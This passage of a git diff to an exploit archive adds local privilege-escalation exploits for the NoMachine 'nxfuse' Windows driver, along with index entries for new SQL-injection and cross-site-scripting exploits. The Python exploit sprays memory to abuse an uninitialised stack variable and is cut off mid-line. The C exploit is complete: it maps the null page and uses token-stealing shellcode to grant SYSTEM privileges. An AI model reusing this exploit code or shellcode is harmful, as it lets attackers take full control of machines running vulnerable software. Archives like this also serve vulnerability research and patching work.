+* Get a handle to a device by its name. The calling code is responsible for
+
+* checking the handle is valid.
+
+@Param device_name – a string representing the name, ie \\\\.\\nxfs-net….
+
+”’
+
+def get_handle(device_name):
+
+ return windll.kernel32.CreateFileA(device_name,
+
+ GENERIC_READ | GENERIC_WRITE,
+
+ 0,
+
+ None,
+
+ OPEN_EXISTING,
+
+ 0,
+
+ None)
+
+
+
+def main():
+
+ print “[+] Attempting to exploit uninitialised stack variable, this has a chance of causing a bsod!”
+
+
+
+ print “[+] Mapping the regions of memory we require”
+
+
+
+ #Try and map the first 3 critical regions, if any of them fail we exit.
+
+ address_1, size_1 = map_memory(0x14c00000, 0x1f0000)
+
+ if address_1 == -1:
+
+ print “[x] Mapping 0x610000 failed with error %x” %size_1
+
+ sys.exit(-1)
+
+
+
+ address_2, size_2 = map_memory(0x41414141, 0x100000)
+
+ if address_2 == -1:
+
+ print “[x] Mapping 0x41414141 failed with error %x” %size_2
+
+ sys.exit(-1)
+
+
+
+ address_3, size_3 = map_memory(0xbad0b0b0, 0x1000)
+
+ if address_3 == -1:
+
+ print “[x] Mapping 0xbad0b0b0 failed with error %x” %size_3
+
+ sys.exit(-1)
+
+
+
+ #this will hold our shellcode
+
+ sc_address, sc_size = map_memory(0x42424240, 0x1000)
+
+ if sc_address == -1:
+
+ print “[x] Mapping 0xbad0b0b0 failed with error %x” %sc_size
+
+ sys.exit(-1)
+
+
+
+ #Now we write certain values to those mapped memory regions
+
+ print “[+] Writing data to mapped memory…”
+
+ #the first write involves storing a pointer to our shellcode
+
+ #at offset 0xbad0b0b0+0xa8
+
+ buff = “\x40BBB” #0x42424240
+
+ bytes_written = write_memory(0xbad0b0b0+0xa8, 4, buff)
+
+
+
+ write_memory(0x42424240, shellcode_len, shellcode)
+
+
+
+ #the second write involves spraying the first memory address with pointers
+
+ #to our second mapped memory.
+
+ print “\t spraying unitialised pointer memory with userland pointers”
+
+
+
+ buff = “\x40AAA” #0x0000000041414140
+
+ for offset in range(4, size_1.value, 8):
+
+ temp_address = address_1.value + offset
+
+ write_memory(temp_address, 4, buff)
+
+
+
+ #the third write simply involves setting 0x41414140-0x18 to 0x5
+
+ #this ensures the kernel creates a handle to a TOKEN object.
+
+ print “[+] Setting TOKEN type index in our userland pointer”
+
+ buff = “\x05”
+
+ temp_address = 0x41414140-0x18
+
+ write_memory(temp_address, 1, buff)
+
+
+
+ print “[+] Writing memory finished, getting handle to first device”
+
+ handle = get_handle(“\\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061”)
+
+
+
+ if handle == STATUS_INVALID_HANDLE:
+
+ print “[x] Couldn’t get handle to \\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061”
+
+ sys.exit(-1)
+
+
+
+ #if we have a valid handle, we now need to send ioctl 0x222014
+
+ #this creates a new device for which ioctl 0x222030 can be sent
+
+ in_buff = struct.pack(“
+
+
+
+#define DEVICE L”\\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061″
+
+#define DEVICE2 L”\\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}”
+
+#define IOCTL 0x00222014
+
+#define IOCTL2 0x00222030
+
+#define OUT_SIZE 0x90
+
+#define IN_SIZE 0x10
+
+
+
+#define KTHREAD_OFFSET 0x124
+
+#define EPROCESS_OFFSET 0x050
+
+#define PID_OFFSET 0x0b4
+
+#define FLINK_OFFSET 0x0b8
+
+#define TOKEN_OFFSET 0x0f8
+
+#define SYSTEM_PID 0x004
+
+#define PARENT_PID 0x140
+
+
+
+__declspec(naked)VOID TokenStealingShellcode()
+
+{
+
+ __asm{
+
+ xor eax, eax;
+
+ mov eax, fs:[eax + KTHREAD_OFFSET];
+
+ mov eax, [eax + EPROCESS_OFFSET];
+
+ mov esi, [eax + PARENT_PID]; Get parent pid
+
+
+
+ Loop1:
+
+ mov eax, [eax + FLINK_OFFSET];
+
+ sub eax, FLINK_OFFSET;
+
+ cmp esi, [eax + PID_OFFSET];
+
+ jne Loop1;
+
+
+
+ mov ecx, eax;
+
+ mov ebx, [eax + TOKEN_OFFSET];
+
+ mov edx, SYSTEM_PID;
+
+
+
+ Search:
+
+ mov eax, [eax + FLINK_OFFSET];
+
+ sub eax, FLINK_OFFSET;
+
+ cmp[eax + PID_OFFSET], edx;
+
+ jne Search;
+
+
+
+ mov edx, [eax + TOKEN_OFFSET];
+
+ mov[ecx + TOKEN_OFFSET], edx;
+
+ add esp, 0x58;
+
+ add[esp], 5;
+
+ ret 4;
+
+ }
+
+}
+
+
+
+typedef NTSTATUS(WINAPI *PNtAllocateVirtualMemory)(
+
+ HANDLE ProcessHandle,
+
+ PVOID *BaseAddress,
+
+ ULONG ZeroBits,
+
+ PULONG AllocationSize,
+
+ ULONG AllocationType,
+
+ ULONG Protect
+
+ );
+
+
+
+typedef NTSTATUS(WINAPI *PNtFreeVirtualMemory)(
+
+ HANDLE ProcessHandle,
+
+ PVOID *BaseAddress,
+
+ PULONG RegionSize,
+
+ ULONG FreeType
+
+ );
+
+
+
+int main()
+
+{
+
+ HMODULE module = LoadLibraryA(“ntdll.dll”);
+
+ PNtAllocateVirtualMemory AllocMemory = (PNtAllocateVirtualMemory)GetProcAddress(module, “NtAllocateVirtualMemory”);
+
+ PNtFreeVirtualMemory FreeMemory = (PNtFreeVirtualMemory)GetProcAddress(module, “NtFreeVirtualMemory”);
+
+
+
+ SIZE_T size = 0x1000;
+
+ PVOID address1 = (PVOID)0x05ffff00;
+
+
+
+
+
+ NTSTATUS allocStatus = AllocMemory(GetCurrentProcess(),
+
+ &address1,
+
+ 0,
+
+ &size,
+
+ MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
+
+ PAGE_EXECUTE_READWRITE);
+
+
+
+ if (allocStatus != 0)
+
+ {
+
+ printf(“[x]Couldnt alloc page\n”);
+
+ exit(-1);
+
+ }
+
+ printf(“[+] Allocated address at %p\n”, address1);
+
+ *(ULONG *)0x05fffff4 = 5;
+
+ *(ULONG *)0x060000ac = 0x20;
+
+ *(ULONG *)0x060001dc = 0x05ffff00;
+
+ *(ULONG *)(0x05ffff00 – 0x18) = 1;
+
+ *(ULONG *)(0x05ffff00 – 0x14) = 0;
+
+
+
+ PVOID address2 = (PVOID)0x1;
+
+ SIZE_T size2 = 0x1000;
+
+
+
+ allocStatus = AllocMemory(GetCurrentProcess(),
+
+ &address2,
+
+ 0,
+
+ &size2,
+
+ MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
+
+ PAGE_EXECUTE_READWRITE);
+
+
+
+ if (allocStatus != 0)
+
+ {
+
+ printf(“[x]Couldnt alloc page2\n”);
+
+ exit(-1);
+
+ }
+
+ *(ULONG *)0x64 = (ULONG)&TokenStealingShellcode;
+
+ printf(“[+] Mapped null page\n”);
+
+
+
+ char inBuff[IN_SIZE];
+
+ char outBuff[OUT_SIZE];
+
+
+
+ HANDLE handle = 0;
+
+
+
+ DWORD returned = 0;
+
+ memset(inBuff, 0x41, IN_SIZE);
+
+ memset(outBuff, 0x43, OUT_SIZE);
+
+
+
+ *(ULONG *)inBuff = 0x00000190;
+
+ *(ULONG *)(inBuff + 4) = 0x00000001;
+
+
+
+ printf(“[+] Creating nxfs-net… device through IOCTL 222014\n”);
+
+ handle = CreateFile(DEVICE,
+
+ GENERIC_READ | GENERIC_WRITE,
+
+ FILE_SHARE_READ | FILE_SHARE_WRITE,
+
+ NULL,
+
+ OPEN_EXISTING,
+
+ FILE_ATTRIBUTE_NORMAL,
+
+ 0);
+
+
+
+ if (handle == INVALID_HANDLE_VALUE)
+
+ {
+
+ printf(“[x] Couldn’t open device\n”);
+
+ exit(-1);
+
+ }
+
+
+
+ int ret = DeviceIoControl(handle,
+
+ IOCTL,
+
+ inBuff,
+
+ IN_SIZE,
+
+ outBuff,
+
+ OUT_SIZE,
+
+ &returned,
+
+ 0);
+
+
+
+ HANDLE handle2 = CreateFile(DEVICE2,
+
+ GENERIC_READ | GENERIC_WRITE,
+
+ FILE_SHARE_READ | FILE_SHARE_WRITE,
+
+ NULL,
+
+ OPEN_EXISTING,
+
+ FILE_ATTRIBUTE_NORMAL,
+
+ 0);
+
+
+
+ char inBuff2[0x30];
+
+ char outBuff2[0x30];
+
+
+
+ printf(“[+] Triggering exploit…”);
+
+
+
+ ret = DeviceIoControl(handle2,
+
+ IOCTL2,
+
+ inBuff2,
+
+ 0x30,
+
+ outBuff2,
+
+ 0x30,
+
+ &returned,
+
+ 0);
+
+
+
+ return 0;
+
+}
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index bbfe68da8..e26209efb 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -9532,6 +9532,9 @@ id,file,description,date,author,type,platform,port
44149,exploits/windows/local/44149.txt,"Microsoft Windows - Constrained Impersonation Capability Privilege Escalation",2018-02-20,"Google Security Research",local,windows,
44150,exploits/multiple/local/44150.rb,"MagniComp SysInfo - mcsiwrapper Privilege Escalation (Metasploit)",2018-02-20,Metasploit,local,multiple,
44152,exploits/windows/local/44152.txt,"Microsoft Windows - StorSvc SvcMoveFileInheritSecurity Arbitrary File Creation Privilege Escalation",2018-02-20,"Google Security Research",local,windows,
+44167,exploits/windows_x86/local/44167.c,"NoMachine x86 < 6.0.80 - 'nxfuse' Privilege Escalation",2018-02-22,"Fidus InfoSecurity",local,windows_x86,
+44168,exploits/windows_x86-64/local/44168.py,"NoMachine x64 < 6.0.80 - 'nxfuse' Privilege Escalation",2018-02-22,"Fidus InfoSecurity",local,windows_x86-64,
+44169,exploits/windows/local/44169.txt,"Armadito Antivirus 0.12.7.2 - Detection Bypass",2018-02-22,"Souhail Hammou",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -38890,3 +38893,15 @@ id,file,description,date,author,type,platform,port
43346,exploits/php/webapps/43346.txt,"Movie Guide 2.0 - SQL Injection",2017-12-15,"Ihsan Sencan",webapps,php,80
43348,exploits/php/webapps/43348.txt,"Monstra CMS 3.0.4 - Arbitrary File Upload / Remote Code Execution",2017-12-18,"Ishaq Mohammed",webapps,php,
43349,exploits/php/webapps/43349.txt,"Cells Blog 3.5 - 'bgid' / 'fmid' / 'fnid' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php,
+44158,exploits/php/webapps/44158.txt,"Joomla! Component CW Tags 2.0.6 - SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php,
+44159,exploits/php/webapps/44159.txt,"Joomla! Component Proclaim 9.1.1 - Backup File Download",2018-02-22,"Ihsan Sencan",webapps,php,
+44160,exploits/php/webapps/44160.txt,"Joomla! Component PrayerCenter 3.0.2 - 'sessionid' SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php,
+44161,exploits/php/webapps/44161.txt,"Joomla! Component Ek Rishta 2.9 - SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php,
+44162,exploits/php/webapps/44162.txt,"Joomla! Component Alexandria Book Library 3.1.2 - 'letter' SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php,
+44163,exploits/php/webapps/44163.txt,"Joomla! Component CheckList 1.1.1 - SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php,
+44164,exploits/php/webapps/44164.txt,"Joomla! Component Proclaim 9.1.1 - Arbitrary File Upload",2018-02-22,"Ihsan Sencan",webapps,php,
+44165,exploits/php/webapps/44165.txt,"Joomla! Component OS Property Real Estate 3.12.7 - SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php,
+44166,exploits/jsp/webapps/44166.txt,"Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) - Multiple Vulnerabilities",2018-02-22,"Core Security",webapps,jsp,
+44170,exploits/php/webapps/44170.txt,"Learning and Examination Management System - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php,
+44171,exploits/php/webapps/44171.txt,"Alibaba Clone Script 1.0.2 - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php,
+44172,exploits/php/webapps/44172.txt,"Groupon Clone Script 3.0.2 - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php,
|